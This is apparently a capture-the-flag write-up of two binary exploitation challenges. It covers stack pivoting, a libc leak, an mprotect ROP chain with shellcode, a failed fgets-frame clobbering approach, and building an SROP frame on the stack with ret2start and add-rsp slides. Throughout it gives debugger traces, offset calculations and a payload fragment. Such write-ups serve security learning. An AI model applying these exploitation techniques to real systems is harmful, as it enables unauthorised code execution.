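The "not enough space after the buffer" complaint is easy to quantify. The numbers below come straight from the fgets call and the chain above. The only outside fact is that fgets stores at most size - 1 bytes before the terminating NUL.

```python
FGETS_SIZE = 0x150  # second argument to fgets
BUF_TO_RBP = 0x110  # buffer starts at rbp - 0x110
QWORD = 8

max_bytes = FGETS_SIZE - 1  # fgets keeps one byte for the NUL
# Bytes left over once the saved rbp and the return address are written.
after_ret = max_bytes - (BUF_TO_RBP + 2 * QWORD)

# The mprotect chain: 11 qwords from POP_RDI through READ.
chain_len = 11 * QWORD

print(hex(after_ret), hex(chain_len))  # 0x2f 0x58
print(chain_len <= after_ret)          # False: does not fit after the return address
print(chain_len <= BUF_TO_RBP)         # True: fits comfortably inside the buffer
```

So only 0x2f bytes (five full qwords) are available past the return address, while the chain needs 0x58, hence the pivot back into the buffer.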
Executing successfully in a debugger, we can see the mprotect call be made:
    0x7f934733962d 7301                  <mprotect+0xd>   jae    0x7f9347339630 <__GI_mprotect+0x10>
    0x7f934733962f c3                    <mprotect+0xf>   ret   
    0x7f9347339630 488b0da1970d00        <mprotect+0x10>   mov    rcx, QWORD PTR [rip + 0xd97a1] # 0x7f9347412dd8
    0x7f9347339637 f7d8                  <mprotect+0x17>   neg    eax
------------------------------------------------------------------------------------------------------------------------ arguments ----
[+] Detected syscall (arch:X86, mode:64)
    mprotect(unsigned long start, size_t len, unsigned long prot)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0xa
    start                $rdi                 0x0000000000404000 <seccomp_init@got[plt]>  ->  0x00007f9347425730 <seccomp_init>  ->  0x9a0a058bfa1e0ff3
Afterwards, we simply call another read() to read our shellcode into the newly rwx .BSS region and win. :)
[+] Detected syscall (arch:X86, mode:64)
    read(unsigned int fd, char __user *buf, size_t count)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x0
    fd                   $rdi                 0x0000000000000000
    buf                  $rsi                 0x0000000000404100  ->  0x0000000000000000
    count                $rdx                 0x0000000000000f00
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1030914] Name: "chall_patched", stopped at 0x7f934733e038 <getsockopt+0x8>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f934733e038 <getsockopt+0x8> (frame name: getsockopt_syscall)
[ #1] 0x7f934733e038 <getsockopt+0x8> (frame name: __getsockopt)
[ #2] 0x000000404100 <NO_SYMBOL>
In summary, what we've done so far:
  1. Stack pivoted to .bss.
  2. Called the main function again, to spray libc pointers into .bss, thereby gaining rbx control.
  3. Prepared the stack frame beneath the _int_free_merge_chunk gadget.
  4. Used rbx control and an add gadget to point the stored stderr pointer in the binary to instead point to stdout.
  5. Called fprintf with rbp relative variables to leak libc through stdout instead of stderr (because it's closed).
  6. Used the libc leak to write an mprotect call to create an rwx page.
  7. Wrote shellcode to win! :)
[+] Opening connection to 172.17.0.2 on port 8000: Done
[!] ret2main
[!] _int_free_merge_chunk gadget
hex(libc.address) = '0x7f1b62a80000'
[!] mprotect payload
[!] read payload
[!] send shellcode
[*] Switching to interactive mode
blahaj{fake_flag}
\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\xa0\xd65\x10\xfe\x7f\x00\x00\xfb\x80\x83\x83\x0f\x7f\x00\x00[*] Got EOF while reading in interactive
$  

concluding remarks

I'd like to thank FS for helping restore my long-dormant Catholicism with this challenge. This challenge took me around 7(?) hours to solve, and most of the beginning was spent chasing down a really interesting exploitation path that ends up almost working.

When fgets() is called, it calls a lot of different helper functions, and the actual 'read' (bytes being written into our buffer) happens a few function calls in. If we position rsp and rbp very, very delicately, we can end up clobbering the return addresses of internal libc functions (as well as any registers they may have pushed onto the stack).

    0x401492 89ce                  <main+0x9f>   mov    esi, ecx
    0x401494 4889c7                <main+0xa1>   mov    rdi, rax
    0x401497 e8d4fbffff            <main+0xa4>   call   0x401070 <memset@plt>
 -> 0x40149c 488b15dd2b0000        <main+0xa9>   mov    rdx, QWORD PTR [rip + 0x2bdd] # 0x404080 <stdin@GLIBC_2.2.5>
    0x4014a3 488d85f0feffff        <main+0xb0>   lea    rax, [rbp - 0x110]
    0x4014aa be50010000            <main+0xb7>   mov    esi, 0x150
    0x4014af 4889c7                <main+0xbc>   mov    rdi, rax
    0x4014b2 e8c9fbffff            <main+0xbf>   call   0x401080 <fgets@plt>
    0x4014b7 b800000000            <main+0xc4>   mov    eax, 0x0
----------------------------------- memory access: $rip+0x2bdd = 0x404080 ----
      0x000000404080|+0x0000|+000: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088
      0x000000404088|+0x0008|+001: 0x0000000000000000
      0x000000404090|+0x0010|+002: 0x0000000000000000
      0x000000404098|+0x0018|+003: 0x0000000000000000
----------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1452864] Name: "chall_patched", stopped at 0x00000040149c <main+0xa9>, reason: SINGLE STEP
------------------------------------------------------------------- trace ----
[*#0] 0x00000040149c <main+0xa9>
[ #1] 0x000000000000 <NO_SYMBOL>
------------------------------------------------------------------------------
gef> p $rsp
$8 = (void *) 0x404f10
gef> p $rbp
$9 = (void *) 0x404f80
gef> 
Here, I have set up rsp and rbp to fulfill this exact scenario. Note how close they are, a mere 0x70 bytes apart. When fgets calls its nested helper functions, their saved registers and return addresses are stored just below rsp, and it just so happens that when we perform our write to [rbp - 0x110], we will whack those values.
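The overlap can be worked out from the two register values printed above. This is only arithmetic on those numbers plus the rbp - 0x110 destination and the 0x150 size from the fgets call. Nothing here is measured from the live process.

```python
BUF_TO_RBP = 0x110
MAX_WRITE = 0x150 - 1  # fgets stores at most size - 1 bytes plus a NUL

rsp, rbp = 0x404F10, 0x404F80

write_lo = rbp - BUF_TO_RBP
write_hi = write_lo + MAX_WRITE  # exclusive end of the data bytes

# Frames of functions called from here grow downwards from rsp, so
# everything in [write_lo, rsp) is shared with libc's own frames.
overlap = max(0, min(rsp, write_hi) - write_lo)
print(hex(write_lo), hex(write_hi), hex(overlap))  # 0x404e70 0x404fbf 0xa0
```

That leaves the first 0xa0 bytes of our input sitting on top of whatever fgets and its callees have pushed, starting with the return address into main at rsp - 8.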
------------------------------------------------------------------------------------------------------------------------------ code: x86:64 (gdb-native) ----
    0x7f99c6bf0678 0f1f840000000000      <__internal_syscall_cancel+0x58>   nop    DWORD PTR [rax+rax*1+0x0]
    0x7f99c6bf0680 488b442410            <__internal_syscall_cancel+0x60>   mov    rax, QWORD PTR [rsp+0x10]
    0x7f99c6bf0685 0f05                  <__internal_syscall_cancel+0x65>   syscall
 -> 0x7f99c6bf0687 5b                    <__internal_syscall_cancel+0x67>   pop    rbx
    0x7f99c6bf0688 c3                    <__internal_syscall_cancel+0x68>   ret   
    0x7f99c6bf0689 0f1f8000000000        <__internal_syscall_cancel+0x69>   nop    DWORD PTR [rax + 0x0]
    0x7f99c6bf0690 83e239                <__internal_syscall_cancel+0x70>   and    edx, 0x39
    0x7f99c6bf0693 83fa08                <__internal_syscall_cancel+0x73>   cmp    edx, 0x8
    0x7f99c6bf0696 75de                  <__internal_syscall_cancel+0x76>   jne    0x7f99c6bf0676 <__internal_syscall_cancel+0x56>
------------------------------------------------------------------------------------------------------------------------------------------------ threads ----
[*Thread Id:1, tid:1452864] Name: "chall_patched", stopped at 0x7f99c6bf0687 <__internal_syscall_cancel+0x67>, reason: SIGINT
-------------------------------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f99c6bf0687 <__internal_syscall_cancel+0x67>
[ #1] 0x7f99c6bf06ad <__syscall_cancel+0xd>
[ #2] 0x7f99c6c64ea6 <read+0x16> (frame name: __GI___libc_read)
[ #3] 0x7f99c6beb861 <__GI__IO_file_underflow+0x151> (frame name: _IO_new_file_underflow)
[ #4] 0x7f99c6bedbeb <_IO_default_uflow+0x2b> (frame name: __GI__IO_default_uflow)
[ #5] 0x7f99c6be08ca <_IO_getline_info+0xaa> (frame name: __GI__IO_getline_info)
[ #6] 0x7f99c6be09c8 <NO_SYMBOL>
[ #7] 0x7f99c6bdf70a <fgets+0x9a> (frame name: _IO_fgets)
[ #8] 0x0000004014b7 <main+0xc4>
[ #9] 0x000000000000 <NO_SYMBOL>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
gef> 
We can see our backtrace, as well as the stack frames of our nested calls. Look at all our helper functions, _IO_default_uflow, _IO_getline_info, all with their own stack frames. Our write will eventually collide with these frames.
----------------------------------------------
gef> frame 3
#3  0x00007f99c6beb861 in _IO_new_file_underflow (fp=0x7f99c6d488e0 <_IO_2_1_stdin_>) at ./libio/libioP.h:1041
⚠️ warning: 1041	./libio/libioP.h: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e20|+0x0000|+000: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
0x000000404e28|+0x0008|+001: 0x00007f99c6d46fd0 <_IO_file_jumps>  ->  0x0000000000000000  <-  $rbp
0x000000404e30|+0x0010|+002: 0x000000000000000a
0x000000404e38|+0x0018|+003: 0x0000000039f41f71  ->  0x2800000000000000  <-  $r13
0x000000404e40|+0x0020|+004: 0x000000000000014f
0x000000404e48|+0x0028|+005: 0x00007f99c6bedbeb <_IO_default_uflow+0x2b>  ->  0x438b480f74fff883  <-  retaddr[4] ($savedip)
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> frame 4
#4  0x00007f99c6bedbeb in __GI__IO_default_uflow (fp=0x7f99c6d488e0 <_IO_2_1_stdin_>) at ./libio/libioP.h:1041
⚠️ warning: 1041	./libio/libioP.h: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e50|+0x0000|+000: 0x4343434343434343 'CCCCCCCC'
0x000000404e58|+0x0008|+001: 0x0000000000000000
0x000000404e60|+0x0010|+002: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404e68|+0x0018|+003: 0x00007f99c6be08ca <_IO_getline_info+0xaa>  ->  0x000090840ffff883  <-  retaddr[5] ($savedip)
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> frame 5
#5  0x00007f99c6be08ca in __GI__IO_getline_info (fp=fp@entry=0x7f99c6d488e0 <_IO_2_1_stdin_>,
    buf=buf@entry=0x404e70 "CCCCCCCCpN@", n=0x14f, delim=delim@entry=0xa,
    extract_delim=extract_delim@entry=0x1, eof=eof@entry=0x0) at ./libio/iogetline.c:60
⚠️ warning: 60	./libio/iogetline.c: No such file or directory
gef> stack
------------------------------------------ Stack top (lower address) ------------------------------------------
0x000000404e70|+0x0000|+000: 0x4343434343434343 'CCCCCCCCpN@'
0x000000404e78|+0x0008|+001: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404e80|+0x0010|+002: 0x0000000143434343
0x000000404e88|+0x0018|+003: 0x0000000000000000
0x000000404e90|+0x0020|+004: 0x4343434343434343
0x000000404e98|+0x0028|+005: 0x00007fff4c79a648  ->  0x00007fff4c79ae9a  ->  0x72772f656d6f682f '/home/wrenches/work/pwn/ret2what/chall_patched'
0x000000404ea0|+0x0030|+006: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
0x000000404ea8|+0x0038|+007: 0x0000000000000000
0x000000404eb0|+0x0040|+008: 0x0000000000404e70  ->  0x4343434343434343 'CCCCCCCCpN@'
0x000000404eb8|+0x0048|+009: 0x00007f99c6dc5000 <_rtld_global>  ->  0x00007f99c6dc6310  ->  0x0000000000000000
0x000000404ec0|+0x0050|+010: 0x0000000000403df0 <__do_global_dtors_aux_fini_array_entry>  ->  0x0000000000401190 <__do_global_dtors_aux>  ->  0x2f0d3d80fa1e0ff3
---------------------------------------- Stack bottom (higher address) ----------------------------------------
gef> 
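To make the collision concrete, here is a small sketch that checks which stack slots fall inside the fgets write. The addresses are copied from the gdb output in this section; the position of _IO_getline_info's return address is an assumption (it assumes a ret directly follows the six pops in its epilogue, with rsp at 0x404e98 when the first pop runs).

```python
# Addresses copied from the gdb output in this writeup (stack pivoted into .bss).
RBP = 0x404f80
BUF = RBP - 0x110    # lea rax, [rbp - 0x110]
WRITE_LEN = 0x150    # fgets(buf, 0x150, stdin): up to 0x14f bytes plus a NUL

# 8-byte stack slots that belong to fgets' callees.
SLOTS = {
    "return into _IO_default_uflow": 0x404e48,
    "return into _IO_getline_info": 0x404e68,
    "_IO_getline_info saved rbx": 0x404e98,
    # Assumption: ret follows the six pops (rbx, rbp, r12..r15).
    "_IO_getline_info return address": 0x404e98 + 6 * 8,
}


def clobbered(slot, start=BUF, length=WRITE_LEN, size=8):
    """True if [slot, slot+size) intersects [start, start+length)."""
    return start < slot + size and slot < start + length


report = {name: clobbered(addr) for name, addr in SLOTS.items()}
for name, hit in report.items():
    print(f"{name:34s} {'overwritten' if hit else 'untouched'}")
```

Under these numbers the deeper frames (the read path below _IO_getline_info) sit just under the buffer and survive, while _IO_getline_info's own saved registers and return address land inside the write.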
And carefully, carefully, after our write finishes, we can see that the stack frame of _IO_getline_info is overwritten. We're at the function epilogue's pop chain, with the stack placed over a bountiful field of 0x414141s.
---------------------------------------------------------------------------------------------- stack ----
$rsp  0x000000404e98|+0x0000|+000: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ea0|+0x0008|+001: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ea8|+0x0010|+002: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404eb0|+0x0018|+003: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404eb8|+0x0020|+004: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ec0|+0x0028|+005: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ec8|+0x0030|+006: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
      0x000000404ed0|+0x0038|+007: 0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]'
-------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f0f526f294c 498d041c              <_IO_getline_info+0x12c>   lea    rax, [r12+rbx*1]
    0x7f0f526f2950 4d894708              <_IO_getline_info+0x130>   mov    QWORD PTR [r15+0x8], r8
    0x7f0f526f2954 4883c428              <_IO_getline_info+0x134>   add    rsp, 0x28
 -> 0x7f0f526f2958 5b                    <_IO_getline_info+0x138>   pop    rbx
    0x7f0f526f2959 5d                    <_IO_getline_info+0x139>   pop    rbp
    0x7f0f526f295a 415c                  <_IO_getline_info+0x13a>   pop    r12
    0x7f0f526f295c 415d                  <_IO_getline_info+0x13c>   pop    r13
    0x7f0f526f295e 415e                  <_IO_getline_info+0x13e>   pop    r14
    0x7f0f526f2960 415f                  <_IO_getline_info+0x140>   pop    r15
-------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1457669] Name: "chall_patched", stopped at 0x7f0f526f2958 <_IO_getline_info+0x138>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f0f526f2958 <_IO_getline_info+0x138> (frame name: __GI__IO_getline_info)
[ #1] 0x4141414141414141 <NO_SYMBOL>
[ #2] 0x4141414141414141 <NO_SYMBOL>
[ #3] 0x4141414141414141 <NO_SYMBOL>
[ #4] 0x4141414141414141 <NO_SYMBOL>
[ #5] 0x4141414141414141 <NO_SYMBOL>
[ #6] 0x4141414141414141 <NO_SYMBOL>
[ #7] 0x4141414141414141 <NO_SYMBOL>
[ #8] 0x4141414141414141 <NO_SYMBOL>
[ #9] 0x4141414141414141 <NO_SYMBOL>
[...]
---------------------------------------------------------------------------------------------------------
gef> 
On its surface, this seems like a great way to get register control easily without having to worry about libc gadget spraying. The issue with this is that this challenge requires more calls to fgets down the line once we mprotect and call our shellcode, and by corrupting the execution of _IO_getline_info, we irreversibly corrupt stdin in a way that prevents us from further calling fgets(). If all we needed was rbx control for a one-gadget, this would fully work! (And indeed, there may or may not be a Dreamhack level 8 which leverages this strategy, haha...).
gef> p *stdin
$7 = {
  _flags = 0xfbad2088,
  _IO_read_ptr = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
  _IO_read_end = 0x2efedf51 'C' <repeats 15 times>, "\200O@",
  _IO_read_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_ptr = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_write_end = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_buf_base = 0x2efede50 'A' <repeats 256 times>, "\n", 'C' <repeats 15 times>, "\200O@",
  _IO_buf_end = 0x2efeee50 "",
  _IO_save_base = 0x0,
  _IO_backup_base = 0x0,
  _IO_save_end = 0x0,
  _markers = 0x0,
  _chain = 0x0,
  _fileno = 0x0,
  _flags2 = 0x0,
  _short_backupbuf = "",
  _old_offset = 0xffffffffffffffff,
  _cur_column = 0x0,
  _vtable_offset = 0x0,
  _shortbuf = "",
  _lock = 0x7f0f5285c7c0 <_IO_stdfile_0_lock>,
  _offset = 0xffffffffffffffff,
  _codecvt = 0x0,
  _wide_data = 0x7f0f5285a9c0 <_IO_wide_data_0>,
  _freeres_list = 0x0,
  _freeres_buf = 0x0,
  _prevchain = 0x7f0f5285b628 <_IO_2_1_stdout_+104>,
  _mode = 0xffffffff,
  _unused2 = '\000' <repeats 19 times>
}
gef> 
Note the state of this stdin file struct. When fgets is further called, it just completely refuses to take any more data, rendering this exploit path utterly useless. :( Perhaps there is some way to not corrupt _IO_read_ptr, or overwrite it with a nice value? I am unfortunately not an FSOP expert.

Enough of that diversion. Onto Pain Cube number two.

lnc26: mixed signals by ndgsghdj

tldr if you hate me and want me to die - build srop frame piece by piece on the stack by using ret2start to shift stack frame upwards and retslides to shift stack frame downwards, deterministic
0000000000400450 <main>:
  400450:	55                   	push   rbp
  400451:	48 89 e5             	mov    rbp,rsp
  400454:	48 8d 4d e0          	lea    rcx,[rbp-0x20]
  400458:	b8 00 00 00 00       	mov    eax,0x0
  40045d:	bf 00 00 00 00       	mov    edi,0x0
  400462:	48 89 ce             	mov    rsi,rcx
  400465:	ba 80 00 00 00       	mov    edx,0x80
  40046a:	0f 05                	syscall
  40046c:	5d                   	pop    rbp
  40046d:	c3                   	ret
Another very simple piece of code: an rbp-relative buffer and a read syscall that overflows it. Standard. When we see an exposed syscall instruction in our binary, the first thought should be very natural - SROP. Note, however, that an SROP frame is larger than the 0x80 bytes a single read gives us.
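A rough size budget, as a sketch: the slot order below is the frame as seen from rsp when the sigreturn syscall executes (the same ordering pwntools uses for its amd64 frame). Treating fpstate as the last slot we must control is an assumption based on the note in the solve script that FPU state is not restored when it is NULL.

```python
# Frame slots relative to rsp at the time of the sigreturn syscall.
FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "cs_gs_fs", "err", "trapno", "oldmask", "cr2", "fpstate",
]
OFFSET = {name: 8 * i for i, name in enumerate(FIELDS)}

READ_SIZE = 0x80    # mov edx, 0x80
RET_OFFSET = 0x28   # buffer at rbp-0x20, then saved rbp, then return address

needed = OFFSET["fpstate"] + 8                # bytes up to and including fpstate
after_ret = READ_SIZE - RET_OFFSET - 8        # bytes one read places past the return address

print(f"frame bytes we care about: {needed:#x}")
print(f"bytes per read past ret:   {after_ret:#x}")
```

One read covers only 0x50 bytes beyond the return address, so the frame has to be assembled over several reads.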

The difficulty in this challenge is that it was written without a single leave gadget in the binary. We do not have rsp control and cannot pivot out into a region of memory with a known address. Typically, for an SROP challenge with a limited size write, we can write the SROP frame in bits and pieces onto a known address somewhere in .bss after pivoting our stack there. We have no such luck here.

The intended solution is to spray and pray a 1/16 partial overwrite to get a leave ; ret gadget somewhere in libc, but I ended up finding a nice deterministic solution. The solution involves a lot of stack feng shui, so for this challenge we temporarily forgo our Catholic roots and turn to Buddhism for guidance and protection. Hopefully this is acceptable and will not send me to Super Hell.

Essentially, we want to write our frame on the stack instead. The way we do this is by slowly moving upwards and downwards within stack space, ensuring that our writes are just perfectly aligned to build a contiguous SROP frame, including the address to our syscall gadget just above. We imagine ourselves as a crane operator - we don't know how high up in the air we are, but we know where the foundation of our building is relative to ourselves. If we can carefully maneuver our hook up and down, we can slowly construct the building bit by bit.

We therefore require two 'stack control' primitives - a way to move downwards, and a way to move upwards. The first one is considerably easier - we have an add rsp, 0x8 gadget within the binary.
-------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x40034b 4885c0                <_init+0xf>   test   rax, rax
    0x40034e 7402                  <_init+0x12>   je     0x400352 <_init+22>
    0x400350 ffd0                  <_init+0x14>   call   rax
 -> 0x400352 4883c408              <_init+0x16>   add    rsp, 0x8
    0x400356 c3                    <_init+0x1a>   ret   
    0x400357 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x400359 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x40035b 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
    0x40035d 0000                  <NO_SYMBOL>   add    BYTE PTR [rax], al
-------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1509462] Name: "main", stopped at 0x000000400352 <_init+0x16>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------- trace ----
[*#0] 0x000000400352 <_init+0x16>
[ #1] 0x000000400450 <main> (frame name: frame_dummy)
[ #2] 0x00337fa49f30 <NO_SYMBOL>
[ #3] 0x000000400450 <main> (frame name: frame_dummy)
[ #4] 0x000000000000 <NO_SYMBOL>
---------------------------------------------------------------------------------------------------------
gef> 
This gadget will allow us to move downwards. In fact, it gives us quite fine-grained control - we can move downwards in 0x10 increments (0x8 from the add, 0x8 from the ret that follows). Even if we do not have precise control over our upwards movement, as long as we can move upwards by _any_ sufficiently large amount, we can chain add rsps to shift ourselves back downwards. Consider this a sort of correcting factor.
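A toy model of the downwards slide, as a sketch. It only tracks rsp, assumes the chain layout `[ADD, junk] * n, main`, and uses main's prologue and epilogue from the disassembly above (push rbp ; mov rbp, rsp ... pop rbp ; ret). The function names are made up for illustration.

```python
def ret(rsp):
    """ret pops one qword off the stack."""
    return rsp + 8


def add_rsp_8_ret(rsp):
    """add rsp, 0x8 ; ret  (skips one junk qword, then pops the next entry)."""
    return ret(rsp + 8)


def next_ret_slot(ret_slot, n_add):
    """Address of main's return slot after re-entering main via n_add gadgets."""
    rsp = ret(ret_slot)           # main's ret jumps to the first chain entry
    for _ in range(n_add):
        rsp = add_rsp_8_ret(rsp)  # each gadget consumes 0x10 bytes of chain
    rbp = rsp - 8                 # push rbp ; mov rbp, rsp
    return rbp + 8                # pop rbp ; ret reads from here


R = 0x1000  # arbitrary starting slot; only the differences matter
for n in range(4):
    print(n, hex(next_ret_slot(R, n) - R))
```

In this model a plain return to main already moves the return slot 0x8 towards higher addresses, and every add rsp gadget in front of it contributes another 0x10.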

This 'upwards' gadget is, conversely, significantly harder to find. There is no direct sub rsp, ... gadget in our binary (not any useful ones, anyway).
0000000000400470 <_fini>:
  400470:	f3 0f 1e fa          	endbr64
  400474:	48 83 ec 08          	sub    rsp,0x8
  400478:	48 83 c4 08          	add    rsp,0x8
  40047c:	c3                   	ret

(base) wrenches@kitty (~/work/pwn/signals) > objdump -d main -M intel --disassembler-color=on | grep rsp
  400340:	48 83 ec 08          	sub    rsp,0x8
  400352:	48 83 c4 08          	add    rsp,0x8
  40036a:	48 89 e2             	mov    rdx,rsp
  40036d:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
  400372:	54                   	push   rsp
  40041e:	48 89 e5             	mov    rbp,rsp
  400451:	48 89 e5             	mov    rbp,rsp
  400474:	48 83 ec 08          	sub    rsp,0x8
  400478:	48 83 c4 08          	add    rsp,0x8
The answer lies in the very start of the binary, specifically, the initialisation functions called when the process is just starting up, in _start.
0000000000400360 <_start>:
  400360:	f3 0f 1e fa          	endbr64
  400364:	31 ed                	xor    ebp,ebp
  400366:	49 89 d1             	mov    r9,rdx
  400369:	5e                   	pop    rsi
  40036a:	48 89 e2             	mov    rdx,rsp
  40036d:	48 83 e4 f0          	and    rsp,0xfffffffffffffff0
  400371:	50                   	push   rax
  400372:	54                   	push   rsp
  400373:	45 31 c0             	xor    r8d,r8d
  400376:	31 c9                	xor    ecx,ecx
  400378:	48 c7 c7 50 04 40 00 	mov    rdi,0x400450
  40037f:	ff 15 53 2c 00 00    	call   QWORD PTR [rip+0x2c53]        # 402fd8 <__libc_start_main@GLIBC_2.34>
  400385:	f4                   	hlt
  400386:	66 2e 0f 1f 84 00 00 	cs nop WORD PTR [rax+rax*1+0x0]
  40038d:	00 00 00
_start() calls __libc_start_main, which eventually calls __libc_start_call_main. This function allocates 0x90 bytes of stack space.
----------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f32b73224ff 90                    <NO_SYMBOL>   nop
    0x7f32b7322500 55                    <__libc_start_call_main>   push   rbp
    0x7f32b7322501 4889e5                <__libc_start_call_main+0x1>   mov    rbp, rsp
 -> 0x7f32b7322504 4881ec90000000        <__libc_start_call_main+0x4>   sub    rsp, 0x90
    0x7f32b732250b 48897d88              <__libc_start_call_main+0xb>   mov    QWORD PTR [rbp - 0x78], rdi
    0x7f32b732250f 897584                <__libc_start_call_main+0xf>   mov    DWORD PTR [rbp - 0x7c], esi
    0x7f32b7322512 48899578ffffff        <__libc_start_call_main+0x12>   mov    QWORD PTR [rbp - 0x88], rdx
    0x7f32b7322519 64488b3c2528000000    <__libc_start_call_main+0x19>   mov    rdi, QWORD PTR fs:0x28
    0x7f32b7322522 48897df8              <__libc_start_call_main+0x22>   mov    QWORD PTR [rbp - 0x8], rdi
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1512782] Name: "main", stopped at 0x7f32b7322504 <__libc_start_call_main+0x4>, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f32b7322504 <__libc_start_call_main+0x4>
[ #1] 0x7f32b7322628 <__libc_start_main_impl+0x88>
[ #2] 0x000000400385 <_start+0x25>
------------------------------------------------------------------------------------------------------------------------------
After it allocates this stack space, it eventually calls our main function. Note that while main runs, this stack space is still allocated: __libc_start_call_main has not returned yet, so its epilogue has not run and its stack frame is still in place.
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f2810a5555e 488b05434a1e00        <__libc_start_call_main+0x5e>   mov    rax, QWORD PTR [rip+0x1e4a43] # 0x7f2810c39fa8
    0x7f2810a55565 488bb578ffffff        <__libc_start_call_main+0x65>   mov    rsi, QWORD PTR [rbp-0x88]
    0x7f2810a5556c 8b7d84                <__libc_start_call_main+0x6c>   mov    edi, DWORD PTR [rbp-0x7c]
 -> 0x7f2810a5556f 488b10                <__libc_start_call_main+0x6f>   mov    rdx, QWORD PTR [rax]
    0x7f2810a55572 ff5588                <__libc_start_call_main+0x72>   call   QWORD PTR [rbp - 0x78] <main>
    0x7f2810a55575 89c7                  <__libc_start_call_main+0x75>   mov    edi, eax
    0x7f2810a55577 e864930100            <__libc_start_call_main+0x77>   call   0x7f2810a6e8e0 <exit>
    0x7f2810a5557c e8dfbd0600            <__libc_start_call_main+0x7c>   call   0x7f2810ac1360 <__nptl_deallocate_tsd>
    0x7f2810a55581 f0832d474b1e0001      <__libc_start_call_main+0x81>   lock   sub DWORD PTR [rip + 0x1e4b47], 0x1 # 0x7f2810c3a0d0 <__nptl_nthreads>
--------------------------------------------------------------------------------------------- memory access: $rax = 0x7f2810c41e28 ----
$rax  0x7f2810c41e28|+0x0000|+000: 0x00007fffc5df7ce8  ->  0x00007fffc5df8ed4  ->  0x504d554a4f545541 'AUTOJUMP_ERROR_PATH=/home/wrenches/.local/share/autojump/errors.[...]'
      0x7f2810c41e30|+0x0008|+001: 0x0000000000000000
      0x7f2810c41e38|+0x0010|+002: 0x0000000000000000
      0x7f2810c41e40|+0x0018|+003: 0x0000000000000000
And of course, once we are back in main(), we get our overflow primitive again. This time, however, we have successfully moved upwards on the stack.

From here on out, the challenge just becomes an exercise in configuring offsets. We slide upwards, then slide downwards just enough to touch the base of our built SROP frame, write our SROP frame, then do it all over again. This is, frankly, agonizing, but it's okay.
payload += p64(elf.sym['_start'])
payload += struct.pack("<H", 0x33)       # rt_sigframe.uc.uc_mcontext.cs
payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.gs
payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.fs
payload += struct.pack("<H", 0x00)       # rt_sigframe.uc.uc_mcontext.__pad0
